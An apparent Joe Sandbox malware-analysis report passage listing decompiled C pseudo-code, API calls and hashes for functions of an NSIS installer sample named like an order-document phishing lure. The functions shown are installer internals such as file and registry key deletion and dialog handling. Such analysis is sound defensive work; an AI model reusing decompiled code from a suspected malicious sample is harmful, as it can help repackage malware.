				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x34));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x00402736
0x00402738
0x00402744
0x00402747
0x00402751
0x00402755
0x00402755
0x0040275b
0x00402768
0x00402770
0x00402773
0x00402779
0x00402787
0x0040278c
0x00402790
0x00402793
0x0040279c
0x004027a8
0x004027ac
0x004027af
0x004027b9
0x004027de
0x004027c0
0x004027c5
0x004027cd
0x004027d3
0x004027d8
0x004027d8
0x004027e5
0x004027e5
0x004027f2
0x004027f8
0x0040280a
0x0040280a
0x00402810
0x00402810
0x0040281b
0x0040281c
0x00402820
0x00402824
0x0040282a
0x0040282a
0x00402831
0x00402237
0x00402954
0x00402960

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
GlobalFree.KERNEL32(?), ref: 004027E5
GlobalFree.KERNEL32(00000000), ref: 004027F8
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 6c7dcdf8261c9d786bb24efcf90e0f1d33b45d541b425cde03fb6c43c6f2b2c7
Instruction ID: 2027d9f4b10c536beff5d97c30926d1382b99fb2686dd4663458e7dd77d5dad7
Opcode Fuzzy Hash: 6c7dcdf8261c9d786bb24efcf90e0f1d33b45d541b425cde03fb6c43c6f2b2c7
Instruction Fuzzy Hash: C5219C71800128BBDF216FA5DE49DAE7A79EF05324F14423EF524762E1CA794D418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404981 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404981(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004060BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004060BB(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004060BB(_t41, _t47, 0x420d30, 0x420d30, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d30), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423ef8, _a4, 0x420d30);
			}

0x00404987
0x0040498c
0x00404994
0x00404995
0x004049a2
0x004049aa
0x004049ab
0x004049ad
0x004049af
0x004049b1
0x004049b4
0x004049b4
0x004049bb
0x004049c1
0x004049c1
0x004049c8
0x004049cf
0x004049d2
0x004049d5
0x004049d5
0x004049d9
0x004049e9
0x004049eb
0x004049ee
0x00404997
0x00404997
0x0040499e
0x0040499e
0x004049f6
0x00404a01
0x00404a17
0x00404a27
0x00404a43

APIs

lstrlenA.KERNEL32(Borerig Setup: Installing,Borerig Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
wsprintfA.USER32 ref: 00404A27
SetDlgItemTextA.USER32(?,Borerig Setup: Installing), ref: 00404A3A

Strings

Borerig Setup: Installing, xrefs: 00404A11, 00404A16, 00404A1C, 00404A30
%u.%u%s%s, xrefs: 00404A09

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Borerig Setup: Installing
API String ID: 3540041739-772784106
Opcode ID: 1956ebf24d5e1f55d94ce1980efd0233ee95868cdb52b5f3f7c77d6cead7fe34
Instruction ID: 454b38ceac9876f8861c3790537a611104b372144c9fccdb064e9295d2f1ba63
Opcode Fuzzy Hash: 1956ebf24d5e1f55d94ce1980efd0233ee95868cdb52b5f3f7c77d6cead7fe34
Instruction Fuzzy Hash: 2111E773A0412837DB0066799C45EAF329CDB85374F254637FA26F31D1EA78CC1242E9

Uniqueness

Uniqueness Score: -1.00%

Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401D95(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402A9F(2);
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				0x40b808->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b818 = E00402A9F(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				 *0x40b81f = 1;
				 *0x40b81c = _t15 & 0x00000001;
				 *0x40b81d = _t15 & 0x00000002;
				 *0x40b81e = _t15 & 0x00000004;
				E004060BB(_t9, _t31, _t33, 0x40b824,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b808);
				_push(_t18);
				_push(_t33);
				E00405FF7();
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401d95
0x00401da0
0x00401da2
0x00401daf
0x00401dc6
0x00401dcb
0x00401dd8
0x00401ddd
0x00401de1
0x00401dec
0x00401df3
0x00401e05
0x00401e0b
0x00401e10
0x00401e1a
0x00402577
0x00401569
0x004028f9
0x00402954
0x00402960

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040B808), ref: 00401E1A

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: db451da96fda065fe5f02a6a41f4c9c1ff559c50a342c71b5ed450c678e34272
Instruction ID: bb5471ef097cc8c5e92714fe4b65473af6cf7b7baf5f4d2141323caa5fcdcc79
Opcode Fuzzy Hash: db451da96fda065fe5f02a6a41f4c9c1ff559c50a342c71b5ed450c678e34272
Instruction Fuzzy Hash: D4014C72944240AFE7006BB5AE5AA997FE8DB55305F10C839F241BA2F2CB7805458FAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D3B(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402AC1(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d45
0x00401d4c
0x00401d7b
0x00401d83
0x00401d8a
0x00401d8a
0x00402954
0x00402960

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ffde7fea2c20ff78d34b9dd6ca395fc00db0322e175274b43119d545686d3dc4
Instruction ID: 074f51ed6dd20aae2d42350fdade0312ac008d0ce280de7d9e26dccf07732080
Opcode Fuzzy Hash: ffde7fea2c20ff78d34b9dd6ca395fc00db0322e175274b43119d545686d3dc4
Instruction Fuzzy Hash: 62F0FFB2600515AFDB00EBA4DE88DAFB7BCFB44301B04447AF645F2191CB748D018B38

Uniqueness

Uniqueness Score: -1.00%

Function 00405A31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A31(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405a32
0x00405a49
0x00405a51
0x00405a51
0x00405a59

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A37
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A40
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405A51

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A31

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction ID: 868260c831235620665dea70b18de3ff29fa680cd517475ab4f5cc36a8a73f00
Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction Fuzzy Hash: 79D023726015303AD1127F154C05DCF1A4C8F023507050077F200B7191CB3C0D514BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402BB4(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				char _v272;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E00405F1F(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402BB4(__eflags, _v8,  &_v272, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E00406431(3);
					if(_t28 == 0) {
						return RegDeleteKeyA(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}

0x00402bbf
0x00402bc8
0x00402bd1
0x00402bdd
0x00402be4
0x00402c08
0x00402bee
0x00402bf0
0x00402c43
0x00000000
0x00402c4b
0x00402bff
0x00402c04
0x00402c06
0x00000000
0x00000000
0x00402c06
0x00402c22
0x00402c2a
0x00402c31
0x00000000
0x00402c54
0x00000000
0x00402c3c
0x00402c5e

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
RegCloseKey.ADVAPI32(?), ref: 00402C22
RegCloseKey.ADVAPI32(?), ref: 00402C43

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
Instruction ID: a71df8347eb47d58d859942eb4958fb6338d9c628d5ecfe9f9dc7c39a89e9901
Opcode Fuzzy Hash: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
Instruction Fuzzy Hash: FA118832504119BBEF01AF91CF09B9E3B79EB04341F104036BA05B50E0E7B4DE61AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00405ACA Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405ACA(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405A5C(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x00405ad3
0x00405ada
0x00405add
0x00405adf
0x00405ae3
0x00405af8
0x00405b17
0x00000000
0x00405aff
0x00405b01
0x00405b02
0x00405b05
0x00405b06
0x00405b0e
0x00000000
0x00000000
0x00405b10
0x00405b13
0x00000000
0x00000000
0x00000000
0x00405b13
0x00000000
0x00405b02
0x00405af0
0x00000000
0x00405af1

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,?,00405B36,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,77313410,?,77312EE0,00405881,?,77313410,77312EE0,00000000), ref: 00405AD8
CharNextA.USER32(00000000), ref: 00405ADD
CharNextA.USER32(00000000), ref: 00405AF1

Strings

C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp, xrefs: 00405ACB

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp
API String ID: 3213498283-1012084975
Opcode ID: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
Instruction ID: db937687bc36527a3f7147c44c8c9b1a0bf4ed848bee0725310acd997699ac17
Opcode Fuzzy Hash: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
Instruction Fuzzy Hash: D8F0C861B14F501AFB2262640C54B776BA8CB99350F04406BD540671C286BC6C404F6A

Uniqueness

Uniqueness Score: -1.00%

Function 004037F7 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004037F7() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2d4
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2e4
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403854();
				return E00405861(_t11, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsa7CF6.tmp", 7);
			}

0x004037f7
0x00403806
0x00403809
0x0040380b
0x0040380b
0x00403812
0x0040381a
0x0040381d
0x0040381f
0x0040381f
0x0040381f
0x00403826
0x00403838

APIs

CloseHandle.KERNEL32(000002D4,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D

Strings

C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp, xrefs: 0040382D
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FC

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp
API String ID: 2962429428-131763055
Opcode ID: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
Instruction ID: a243388e665e2d569925beaf0092b2dcbae65f1e85c6ca02b15765f08549dd2e
Opcode Fuzzy Hash: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
Instruction Fuzzy Hash: 08E04F3250071896C620BF79AE494853B599B41735724C776F138B20F1C73899975AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405134 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405134(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x420d1c - _t16; // 0x0
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
								 *0x420d1c = _t16;
								E00404B0B();
							}
						}
						L11:
						return CallWindowProcA( *0x420d24, _a4, _t15, _a12, _t16);
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404A8B(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E004041A6(0x413);
					return 0;
				}
				goto L10;
			}

0x00405138
0x00405142
0x00405158
0x0040515e
0x00405180
0x00405183
0x00405183
0x00405189
0x0040518b
0x00405191
0x00405193
0x00405194
0x00405196
0x0040519c
0x0040519c
0x00405191
0x004051a6
0x00000000
0x004051b4
0x00405163
0x00405169
0x0040516b
0x004051a3
0x004051a3
0x00000000
0x004051a3
0x00405177
0x00405179
0x00000000
0x00405179
0x00405148
0x0040514f
0x00000000
0x00405154
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405163
CallWindowProcA.USER32(?,?,?,?), ref: 004051B4

Part of subcall function 004041A6: SendMessageA.USER32(00010410,00000000,00000000,00000000), ref: 004041B8

Strings

, xrefs: 00405144

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
Instruction ID: c2e14b81eed27f6ef80c9e529a4f942fbf68e082709ee8d6c9922b6f58a3139d
Opcode Fuzzy Hash: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
Instruction Fuzzy Hash: 7801B131900608AFEF218F41DD80F6B3676EB84750F244137FA00BA1D1C7799D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403854 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403854() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41fcf4; // 0x522ce0
				_t3 = E00403839(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
